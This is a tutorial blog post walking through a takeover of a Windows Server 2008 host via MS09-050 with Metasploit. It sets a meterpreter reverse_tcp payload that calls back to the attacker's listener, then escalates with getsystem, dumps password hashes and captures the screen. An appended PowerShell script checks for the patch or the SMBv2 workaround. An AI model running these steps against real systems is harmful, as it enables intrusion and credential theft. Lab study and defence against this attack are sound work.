Simple Take Over of Windows Server 2008


I found this little vulnerability while running a Nessus scan and wanted to see what I could do with it. As you see in the screenshot, it is a Critical vulnerability called MS09-050.


So I started my Metasploit by going to cd /opt/metasploit/apps/pro/msf3 as root.


Then type search ms09-050 at the prompt as shown in the screenshot.


As you see in the above screenshot, where the arrow is pointing it says “good”. Cool, right!

Now type “use” as shown, then just copy and paste that exploit name after it.


Then you are going to want to see the options available, so type “show options”.


Set the IP of the host that you want to exploit as shown above.

Now you want to see what payloads are available. There is a long list of payloads. From what I hear, the best one is windows/meterpreter/reverse_tcp.


Type that command in as shown below, then “show options” to see what options you may have to set. As you see here we can set a listening host. Set your IP and soon the fun begins.


Now just type in “exploit”, then “help” or “?” to see a list of all the fun things you can do on this system.



As you can see below, my two favorite commands are “getsystem” and “hashdump”.

getsystem escalates the session to full control of the system.

hashdump dumps the password hashes, so you can see who the users of the system are and work from the hashes toward their passwords.


Got the system.


Dumped the hashes (note the users).


idletime is a fun command to see how long the system has been idle.

screenshot is fun to see what is going on.

Notice where the screenshot has been saved to. I will show you how to view it.


In the top left of your Kali Linux desktop you see Applications and Places.

Click on Places, then File System.


Then follow the path: click the usr folder,


then the share folder,


then click the metasploit-framework folder.


Then look for the file name that the system gave the screenshot.


And Bada Boom Bada Bing, here is the desktop of this unsuspecting user. (Actually, it was my own little server that I had running for the purpose of this demonstration.)


This stuff is tons of fun to learn, and even better to know how to defend against, because an attack like this one can wipe out the entire network.
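As an added example (not part of the original post), here is the defender-side check that goes with the sentence above: a PowerShell script that reports whether a Windows host still exposes the SMBv2 flaw exploited here. It assumes the Microsoft hotfix ID for MS09-050, which this page does not give, so that value is a placeholder to fill in from the bulletin; the registry workaround it checks (SMB2 = 0 under LanmanServer\Parameters) is the mitigation Microsoft published for unpatched hosts.

```powershell
# Added defensive check for MS09-050 (SMBv2). Not code from the original post.
# Run locally on the server you want to verify (Server 2008 era hosts).
param(
    # PLACEHOLDER: the KB number of the MS09-050 update, taken from the bulletin.
    [string]$HotfixId = "KB<MS09-050-update-number>"
)

$result = [ordered]@{
    Computer        = $env:COMPUTERNAME
    HotfixInstalled = $false
    Smb2Disabled    = $false
    Verdict         = ""
}

# 1. Is the fixing update present? Get-HotFix lists installed updates
#    (it reads Win32_QuickFixEngineering under the hood).
$hotfix = Get-HotFix -ErrorAction SilentlyContinue |
          Where-Object { $_.HotFixID -eq $HotfixId }
$result.HotfixInstalled = [bool]$hotfix

# 2. Was the SMBv2 workaround applied? Microsoft's mitigation for hosts that
#    could not be patched immediately sets this value to 0 (SMBv2 off).
$regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
$smb2 = (Get-ItemProperty -Path $regPath -Name SMB2 -ErrorAction SilentlyContinue).SMB2
$result.Smb2Disabled = ($null -ne $smb2 -and $smb2 -eq 0)

# 3. Verdict: patched beats workaround; neither means the Nessus finding
#    above would still light up against this host.
if ($result.HotfixInstalled) {
    $result.Verdict = "patched"
} elseif ($result.Smb2Disabled) {
    $result.Verdict = "unpatched, but SMBv2 disabled (workaround in place)"
} else {
    $result.Verdict = "EXPOSED: install the update, or disable SMBv2 until you can"
}

[pscustomobject]$result
```

Note that the registry workaround needs a reboot or a restart of the Server service to take effect, so a value of 0 on its own is not proof that SMBv2 is actually off; a Nessus rescan is the confirming check.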

